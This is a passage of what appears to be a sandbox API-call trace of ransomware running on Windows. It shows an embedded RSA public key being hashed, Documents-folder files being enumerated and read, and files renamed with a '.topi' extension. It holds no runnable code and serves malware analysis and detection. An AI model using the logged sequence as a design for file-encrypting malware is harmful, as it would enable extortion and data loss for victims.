KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.991] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.991] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.992] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.993] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.993] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.993] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.993] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.993] GetLastError () returned 0x0 [0094.993] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.993] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.993] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.993] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.993] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8560) returned 0x99f72d8 [0094.994] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1608 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9270 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1650 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9288 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92b8 [0094.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92d0 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.995] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92b8 | out: hHeap=0x680000) returned 1 [0094.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92d0 | out: hHeap=0x680000) returned 1 [0094.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.995] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d92d0 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d92b8 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92d0 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92b8 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.996] GetCurrentThreadId () returned 0x8c4 [0094.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5650 [0094.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.997] GetCurrentThreadId () returned 0x8c4 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92b8 [0094.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92d0 [0094.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92a0 [0094.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.999] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fUQVfBdmb1_EwjYXxrH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fuqvfbdmb1_ewjyxxrh.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fUQVfBdmb1_EwjYXxrH.docx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fuqvfbdmb1_ewjyxxrh.docx.topi")) returned 1 [0095.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.000] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.002] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6cdbb5a0, ftCreationTime.dwHighDateTime=0x1d5c588, ftLastAccessTime.dwLowDateTime=0x596039e0, ftLastAccessTime.dwHighDateTime=0x1d5c3f5, ftLastWriteTime.dwLowDateTime=0x596039e0, ftLastWriteTime.dwHighDateTime=0x1d5c3f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gydf_ honDHk", cAlternateFileName="GYDF_H~1")) returned 1 [0095.002] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HHDQ5hSW5Mh.xlsx") returned=".xlsx" [0095.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HHDQ5hSW5Mh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hhdq5hsw5mh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.002] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=102133) returned 1 [0095.002] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.005] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18ecf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.005] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.006] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.006] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x18ef5, lpOverlapped=0x0) returned 1 [0095.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.007] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.008] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.008] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.008] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.008] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.008] GetLastError () returned 0x0 [0095.009] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.009] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.009] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.009] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.009] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18f00) returned 0x9a06a00 [0095.010] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1650 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9288 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1698 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92a0 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92d0 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92e8 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.010] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92d0 | out: hHeap=0x680000) returned 1 [0095.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92e8 | out: hHeap=0x680000) returned 1 [0095.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d92e8 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d92d0 [0095.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92e8 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92d0 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.011] GetCurrentThreadId () returned 0x8c4 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f56e0 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.011] GetCurrentThreadId () returned 0x8c4 [0095.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | 